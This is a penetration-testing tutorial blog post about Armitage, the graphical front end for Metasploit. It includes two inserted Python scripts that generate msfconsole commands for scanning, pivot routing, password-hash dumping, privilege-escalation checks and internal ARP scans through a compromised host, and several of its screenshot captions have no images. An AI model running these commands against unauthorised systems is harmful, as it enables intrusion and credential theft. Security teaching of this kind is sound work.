• Div0 Blog Editor

Armitage — Metasploit Made Easy

Introduction

I am sure anyone who does penetration testing or is active in the security field knows what Metasploit is, and what it does. However, the initial learning curve for Metasploit may be daunting for security newbies who are interested in penetration testing but have no idea where to start.

Armitage is a graphical front end for the Metasploit Framework. Its main feature is to map each stage of a penetration test (information gathering, exploitation and post-exploitation) onto a few clicks.


Information Gathering

Information gathering is the most important component of any penetration test. Without the necessary information there is no way to carry out an efficient penetration test. Armitage provides information-enumeration features by leveraging nmap and Metasploit's own scanning modules. The three main scanning features are nmap, MSF Scans (msfscan) and DNS enumeration.

MSF Scans runs its Metasploit scanner modules against every address in the target range, whether or not a host is actually up. For a more efficient scan, first run an ARP scan or ping discovery with nmap to find the live hosts, then point MSF Scans at only those.

Results returned from any scan in Armitage are stored in the Metasploit database, so they can be reviewed during the later stages of the penetration test. Armitage can also import scan results from other tools such as Nessus or nmap into the same database, which gives users the flexibility to combine results from several tools.
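To make the scanning workflow concrete, here is an added example (not code from the original post or from the Armitage project) that does by hand what the nmap-then-MSF-Scans sequence does behind the buttons: parse an nmap XML report, keep only hosts that are up, and emit an msfconsole resource script that imports the report into the database and then runs a version scanner only against the hosts that actually expose each port. The nmap XML is a constructed sample, and the port-to-module mapping and the `discovery.xml` path are assumptions for illustration.

```python
"""Added example: build the msfconsole resource script that Armitage's
nmap-then-MSF-Scans workflow amounts to.

Input is nmap XML (-oX). The XML below is a constructed sample, not a real
scan; the port-to-module mapping is an assumption chosen for illustration.
"""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output: two hosts up, one down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
  <host><status state="up"/><address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Which Metasploit version scanner to run for an open port. The module paths
# exist in the framework; which ports to cover is an assumption for this example.
PORT_TO_SCANNER = {
    22: "auxiliary/scanner/ssh/ssh_version",
    445: "auxiliary/scanner/smb/smb_version",
    3306: "auxiliary/scanner/mysql/mysql_version",
}


def parse_nmap_xml(xml_text):
    """Return {ip: [open tcp ports]} for the hosts nmap reports as up.

    Hosts that are down are dropped here, which is exactly why a discovery
    scan before MSF Scans saves time: nothing is scanned that is not there.
    """
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = [
            int(p.get("portid"))
            for p in host.findall("ports/port")
            if p.get("protocol") == "tcp" and p.find("state").get("state") == "open"
        ]
        hosts[addr.get("addr")] = sorted(open_ports)
    return hosts


def build_resource_script(hosts, db_import_path="discovery.xml"):
    """Emit msfconsole commands: import the scan into the database, then run
    one version scanner per port, limited to the live hosts exposing it."""
    lines = [f"db_import {db_import_path}"]
    port_to_hosts = {}
    for ip, ports in hosts.items():
        for port in ports:
            port_to_hosts.setdefault(port, []).append(ip)
    for port in sorted(port_to_hosts):
        module = PORT_TO_SCANNER.get(port)
        if module is None:
            continue  # no scanner mapped for this port; the db_import still records it
        lines += [f"use {module}",
                  f"set RHOSTS {','.join(sorted(port_to_hosts[port]))}",
                  "run"]
    # Finish by listing what the database now knows, as Armitage's host view would.
    lines += ["hosts", "services"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_resource_script(parse_nmap_xml(SAMPLE_NMAP_XML)))
```

Save the output as, say, `scan.rc` and run it with `msfconsole -r scan.rc`; the `hosts` and `services` listings at the end are the same data Armitage shows in its host view after a scan.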


List of Scans:

nmap Scan Results:

Exploitation

Armitage turns exploitation into a clicking game. Selecting "Find Attacks" makes Armitage shortlist exploits based on the operating system and service information gathered in the previous phase.

Users can then launch the respective exploit by clicking "Launch". Armitage fills in the options the Metasploit Framework needs automatically. However, the defaults Armitage chooses will not suit every situation; check the payload, the target (OS and service pack) selection and the listener address (LHOST) before launching.


Once an exploit is successful, the graphical representation of the target host will turn red.

One function I find very interesting is "Hail Mary", which launches every exploit shortlisted by Armitage against the targets. It is extremely noisy and can crash fragile services, so use it only where that is acceptable.

List of Applicable Exploits:

Options for Launching an Exploit:

Target Exploited Successfully:

Post-Exploitation

The best part of Armitage is the ability to run all the post-exploitation processes with just a few clicks.

The list of features available is:

  • Dump hashes

  • Privilege escalation

  • Exploring the file system

  • Set up a pivot attack

There are additional post-exploitation modules available in the left panel. Command-line fanatics can choose to interact with the session directly and do their magic.
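For readers who prefer to see what those buttons send to Metasploit, here is an added example (not code from the original post or from the Armitage project) covering the post-exploitation list above. It reads a Meterpreter `ipconfig` listing from the compromised host, works out which networks the session can reach that the attacker cannot, and emits the resource-script equivalents of "Setup Pivot" (`route add` through the session), "Dump hashes", a privilege-escalation check and the ARP scan via the exploited host. The interface listing is a constructed sample; the session id, the set of networks the attacker already reaches, and the choice of post modules are assumptions for illustration.

```python
"""Added example: generate the msfconsole commands behind Armitage's
post-exploitation buttons from a session's interface listing.

The Meterpreter `ipconfig` output below is a constructed sample; the session
id and the choice of post modules are assumptions for illustration.
"""
import ipaddress
import re

# Constructed sample of Meterpreter `ipconfig` output on a dual-homed host.
SAMPLE_IPCONFIG = """
Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3e:5d:10
MTU          : 1500
IPv4 Address : 10.0.0.5
IPv4 Netmask : 255.255.255.0

Interface 12
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:3e:5d:1a
MTU          : 1500
IPv4 Address : 192.168.50.20
IPv4 Netmask : 255.255.255.0
"""

ADDR_RE = re.compile(r"IPv4 Address\s*:\s*(\S+)\s+IPv4 Netmask\s*:\s*(\S+)")


def reachable_networks(ipconfig_text, attacker_reachable):
    """Networks the session can reach that the attacker cannot: the pivot candidates.

    attacker_reachable: CIDR strings the attacker already reaches directly.
    """
    known = [ipaddress.ip_network(n) for n in attacker_reachable]
    nets = []
    for addr, mask in ADDR_RE.findall(ipconfig_text):
        net = ipaddress.ip_interface(f"{addr}/{mask}").network
        if net.is_loopback or net in nets:
            continue
        # Routing a network the attacker already reaches through the session
        # would only add latency and noise, so skip it.
        if any(net.subnet_of(k) for k in known):
            continue
        nets.append(net)
    return nets


def build_post_exploit_rc(session_id, ipconfig_text, attacker_reachable):
    """Emit the resource-script equivalent of the post-exploitation buttons."""
    nets = reachable_networks(ipconfig_text, attacker_reachable)
    lines = []
    # "Setup Pivot": one Metasploit route per newly reachable network, so later
    # scans and exploits against it are tunnelled through this session.
    for net in nets:
        lines.append(f"route add {net.network_address} {net.netmask} {session_id}")
    # "Dump hashes": the post module needs SYSTEM privileges, which is why the
    # privilege-escalation step normally comes first if the session lacks them.
    lines += ["use post/windows/gather/hashdump", f"set SESSION {session_id}", "run"]
    # "Privilege escalation": list local exploits the session's host looks vulnerable to.
    lines += ["use post/multi/recon/local_exploit_suggester",
              f"set SESSION {session_id}", "run"]
    # "ARP Scan via the exploited host": discover neighbours on the new network.
    for net in nets:
        lines += ["use post/windows/gather/arp_scanner", f"set SESSION {session_id}",
                  f"set RHOSTS {net}", "run"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Assumed: session 1 is the Meterpreter session on 10.0.0.5, and the
    # attacker already sits on 10.0.0.0/24.
    print(build_post_exploit_rc(1, SAMPLE_IPCONFIG, ["10.0.0.0/24"]))
```

Once the `route add` line is in place, `route print` in msfconsole shows the same pivot that Armitage draws as a route through the compromised host, and any scanner module pointed at 192.168.50.0/24 is carried over the session rather than sent from the attacker's own interface.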

Post-Exploitation Options:

View Items Stored in Armitage Database:

Dumped Hashes:

Performing ARP Scan via the Exploited Host:

Attack Pivot Route:

Armitage Post-Exploitation Modules:

Shared by Sunny Neo.


Division Zero (Div0) © 2017-2020.

Edgis © 2011-2017.